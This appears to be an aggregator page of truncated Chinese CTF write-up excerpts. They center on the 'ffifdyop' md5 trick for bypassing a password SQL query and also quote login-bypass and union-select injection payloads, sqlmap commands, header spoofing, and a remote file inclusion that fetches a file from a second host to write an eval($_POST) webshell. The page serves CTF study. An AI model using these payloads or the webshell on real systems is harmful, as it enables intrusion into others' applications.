ffifdyop】的更多相关文章

题目地址:http://www.shiyanbar.com/ctf/2036 后台登陆 上来看到这个界面,果断先看一波源代码. 看到是拼接字符串进行sql查询,就想到了注入了. 但是很不幸的是md5()函数对你写进去的字符进行了哈希.什么意思呢? 比如你想用' or 1=1%23,md5()都会破坏你原有的结构. 让我们自己做个小实验. 算了还是先看一下md5("字符串",true)这个函数吧,没有觉得他很怪吗,平时很少见这个true参数吧. 看样子第二个不带true参数的才是我们平时…
根据师傅们的博客总结如下: ffifdyop 经过md5加密后:276f722736c95d99e921722cf9ed621c 再转换为字符串:'or'6<乱码>  即  'or'66�]��!r,��b 用途: select * from admin where password=''or'6<乱码>' 就相当于select * from admin where password=''or 1  实现sql注入 题目:实验吧——md5绕过 链接:http://ctf5.shiy…
Pctf ** web100 PORT51**  开始看到这个真的无法下手,想过用python–socket编程或者scapy发包.自己觉得是可以的,但是没有去试,后面看一大神writeup,知道: 最简单的payload:一个curl命令的事,涨姿势了 curl –local-port 51 103.39.76.105:32772/ 其中–local-port 51 强制使用本地51端口 所以最后的flag就是PCTF{M45t3r_oF_CuRl} 另外在本文后面贴一份C语言实现这道题的代码…
引言 接触CTF 差不多一个月了,网上题目刷得也差不多,做了不少笔记,老想总结一下.当然,这种文章网上多得是. 正文笔记 少不了弱类型,松散比较,放一张图 2.  mysql_real_escape_string 不转义的 :  %   和  _ 3.    $sql = "SELECT * FROM admin WHERE pass = '".md5($password,true)."'"; 这中sql语句,当md5后的hex转换成字符串后,如果包含 'or'&l…
1.代码审计发现 这里没有用escape_string,因此存在注入. function show($username){ global $conn; $sql = "select role from `user` where username ='".$username."'"; $res = $conn ->query($sql); if($res->num_rows>0){ echo "$username is ".$re…
最简单的SQL注入 查看页面源码发现提示要登录admin账户 果断试试万能密码admin' or 1=1# 直接能看到flag了 最简单的SQL注入(熟悉注入环境) 首先查看源码,提示id=1,看样子是个数字型注入,直接给id传入1 or 1=1# 防注入 查看提示还是给id传参,一开始以为是字符过滤,试了好久也没试出来,后来在返回头中看到charset=gb2312,猜测可能是个宽字节注入 给id=%df'   果然报错了,接下来就是常规注入了,先order by得到一共三个字段 得到显示位是…
汇总下php中md5()的安全问题 安全问题1: 1.x=任意字符串  md5('x')=0e*** 2.y=任意字符串  md5('y')=0e*** 如果x==y,php会返回true,在有些时候可以绕过逻辑判断 x==0 /y==0都为true,有些时候可以用来绕过逻辑判断 原理:php使用==会把两边的数值进行类型转换,0e***都转换成了0 例子var_dump(md5('240610708') == md5('QNKCDZO'));  返回true 修复方案,进行类型匹配使用强等于(…
第一关 万能密码:username='or '1'='1'#    password=1    即可登录得到flag. 第二关 最基础的注入,order by 判断字段数,然后 union select 查询表,列,字段. payload:id=1 union select 1,database(),3 from information_schema.tables where table_schema=database()%23   得到数据库名,之后自己发挥.... 第三关 懵逼了很长时间,一…
实验吧web题: 这个有点简单 因为刚了解sqlmap,所以就拿sqlmap来练练手了 1,先测试该页面是否存在sql注入漏洞 2.找到漏洞页面,复制url,然后打开sqlmap 先查看当前数据库 然后爆出: 然后爆出数据库下的表:sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db –tables 字段:sqlmap.py -u "http://ctf5.shiyanbar.com/8/inde…
0x00前言 发现一个很好的ctf平台,题目感觉很有趣,学习了一波并记录一下 https://www.jarvisoj.com 0x01 Port51 题目要求是用51端口去访问该网页,注意下,要用具有公网的计算机去连,我这里用的我的腾讯云服务器去访问的,本地并不能反回正确结果,因为本地私有地址从代理服务器出去后,使用的是代理服务器的端口,这个端口往往不会是51 curl --local-port http://web.jarvisoj.com:32770/ 0x02 LOCALHOST 题目提…
经历了学校的校赛,一度自闭,被大佬们刺激的要奋发图强. 1.后台登录 链接: http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 打开题目首先查看源码,源码中注释部分有提示. <!-- $password=$_POST['password']; $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true).&quo…
简介 最近在刷CTF题,主攻Web,兼职Misc Shiyanbar 0x01 简单的登陆题 简单概括: 考点: %00截断正则 CBC字节翻转攻击 难度: 难 WP:https://blog.csdn.net/include_heqile/article/details/79942993 解题过程: F12查看响应头,发现返回tips 访问test.php文件得到源代码: <?php define("SECRET_KEY", '***********'); define(&qu…
PORT51 题目链接:http://web.jarvisoj.com:32770/ 这道题本来以为是访问服务器的51号端口,但是想想又不太对,应该是本地的51号端口访问服务器 想着用linux下的curl命令指定本地端口 curl --local-port 51 http://web.jarvisoj.com:32770/ 测试过程中在虚拟机没成功,于是在windows下用本地端口访问,成功 windows下curl下载地址https://curl.haxx.se/download.html,…
看起来有点难 提交admin http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=admin&action=login 用sqlmap检测是否有注入 ┌─[root@sch01ar]─[/sch01ar] └──╼ #sqlmap -u "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=admin&ac…
2017swpu-ctf总结 今年是我第一次出题感受很多,就分析几道我印象最深刻的题吧 你能进入后台吗? 这道题主要是考察php_screw还有md5加密开启true过后的注入 phpscrew加密在github上有解密工具 工具地址 至于绕过md5($password,true)这个其实主要就是通过md5后的hex值转换成字符串如果包含'or'就导致绕过注入 字符串:ffifdyop满足上述条件 flag!flag! 这是我出的题本来是想出thinkphp的洞的,不过已经有一个thinkphp…
后台登录 1.看源码有这样一段php代码<!-- $password=$_POST['password']; $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'"; $result=mysqli_query($link,$sql);  if(mysqli_num_rows($result)>0){   echo 'fla…
PHP md5()函数的简单绕过方法,该篇作为学习笔记简单记录一下.   例题   例题链接: http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php   主要代码段: $password=$_POST['password']; $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'"; $r…
写的有点多了,上一篇放在一起显得有点臃肿,就再起一篇吧~ 迷路的老铁点这里:[代码审计]PHP_Bugs题目总结(1) 0x14 intval函数四舍五入 <?php if($_GET[id]) { mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS); mysql_select_db(SAE_MYSQL_DB); $id = intval($_GET[id]); ## 这里过滤只…
每次看别人的Writeup都有一种感觉,为什么有了WriteUp我还是不会,每次都打击自己的积极性,所以自己尝试写一篇每个萌新都能看懂的Writeup. 0x01 天下武功唯快不破 题目提示 : 看看响应头 既然让看响应头,那就看一下响应头. F12 -> 点击network -> 查看响应头 我们看到了响应头里面有一个属性FLAG.用base64编码了. 解码后是 P0ST_THIS_T0_CH4NGE_FL4G:Q3OXSguWO 就是说我们要用Post发送一条请求,然后再看页面的注释 :…
title: False注入,以及SQL注入技巧总结 date: 2017-04-25 00:23:31 tags: ['SQL注入'] --- 利用False我们可以绕过一些特定的WAF以及一些未来不确定的因素,其中有些姿势之前了解但是没有去深入,这次做一个归纳总结. 原文首发在安全客,文章地址:http://bobao.360.cn/learning/detail/3804.html 有点可惜小编排版有些不是很完美. 0x01 False Injection 0 :引子 首先我们常见的注入…
0x00 知识点 password='".md5($pass,true)."' 链接: https://www.jianshu.com/p/12125291f50d  ffifdyop,这个点的原理是 ffifdyop 这个字符串被 md5 哈希了之后会变成 276f722736c95d99e921722cf9ed621c,这个字符串前几位刚好是 ' or '6, 而 Mysql 刚好又会吧 hex 转成 ascii 解释,因此拼接之后的形式是1select * from 'admin…
题目地址:http://www.shiyanbar.com/ctf/2036 这道题确实有点考研脑洞了. 1.首先,查看网页源代码(Ctrl+U),会发现一段PHP代码: $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'"; 意思就是:用输入经过md5加密后的密码和admin用户名查询,结果等于sql,然后执行该sql语句. 介绍…
web3 题目描述: 方法一:RFI 使用url实现php远程文件包含 在服务器上构造1.txt <?php $a = "<?php eval(\$_POST['123'])?>"; $b = fopen("a.php","w") or die("123!"); fwrite($b,$a); fclose($b); ?> 访问: http://ip1/index.php?url=http://ip2/1…
题目入口: http://web.jarvisoj.com:32772/ 有个登陆框,随便提交参数然后bp抓包 get到了一个Hint,给了sql查询的语句 select * from `admin` where password=' ".md5($pass,true)." ' 可以看到传上去的参数经过了md5加密后再进行查询.md5()第二个参数是输出格式.true,表示输出原始16字符二进制格式: false,则输出32字符十六进制数. 题目中是ture,也就是说加密后的md5会转…
各种关于md5的Bypass操作,都是基本操作,考察数组绕过.弱类型比较绕过以及md5($password,true) ByPass 1.利用md5($password,true)实现SQL注入 F12或者Burp抓取响应头可以看到Hint,也就是后端处理的SQL语句: select * from 'admin' where password=md5($pass,true) 突破点在md5($pass,true)这里,先来看看md5函数的用法: 可以看到这里的raw参数是True,意为返回原始1…
简介  原题复现:https://gitee.com/xiaohua1998/BJDCTF2020_January  线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 1.Easy MD5  1.涉及知识点:md5函数特性绕过.SQL注入  md5()  md5() 函数计算字符串的 MD5 散列. md5() 函数使用 RSA 数据安全,包括 MD5 报文摘要算法. md5(string,raw) string 必…
22 弱类型整数大小比较绕过 <?php error_reporting(0); $flag = "flag{test}"; $temp = $_GET['password']; is_numeric($temp)?die("no numeric"):NULL; if($temp>1336){ echo $flag; } ?> 对于传入的password,赋值给temp,使用 is_numeric 函数进行判断,如果是数字的话退出,否则进行后面的判…
[BJDCTF 2nd]假猪套天下第一 假猪套是一个梗吗? 进入题目,是一个登录界面,输入admin的话会返回错误,登录不成功,其余用户可以正常登陆 以为是注入,简单测试了一下没有什么效果 抓包查看信息,发现源代码有提示 访问L0g1n.php 显示需要在99年后才开放访问,请求头里面有time,修改成一个很大的数字 返回信息变成了需要从本地访问,使用XFF或者Client-ip绕过 现在的错误信息变成了需要来自于gem-love.com,添加Referer头 现在变成了需要使用Commodo…
1.抓包修改 ​ 提示修改id,postman修改headers里面的id 分析得到id是admin加admin的base64编码,payload为id: adminYWRtaW4= 请求后又提示请使用主机访问,修改xff, X-Forwarded-For: 127.0.0.1 再次请求又提示要从谷歌访问,修改Referer,再次访问得到flag 2.文件上传漏洞与文件包含 ​ 写好木马,修改mime,绕过类型判断.但是发现服务器将上传的文件进行了重命名,文件类型.php也被改为了.jpg.观察…
目录 [BJDCTF 2nd]fake google(SSTI) [BJDCTF2020]Easy MD5(md5注入) [ZJCTF 2019]NiZhuanSiWei(反序列化) [BJDCTF 2nd]fake google(SSTI) 查看页面源代码 输入null,提示是SSTI,简单验证下,这里过滤了+号. 存在eval函数. payload: http://cb7d998a-510b-4021-8bf8-28b0ac306920.node3.buuoj.cn/qaq?name={%…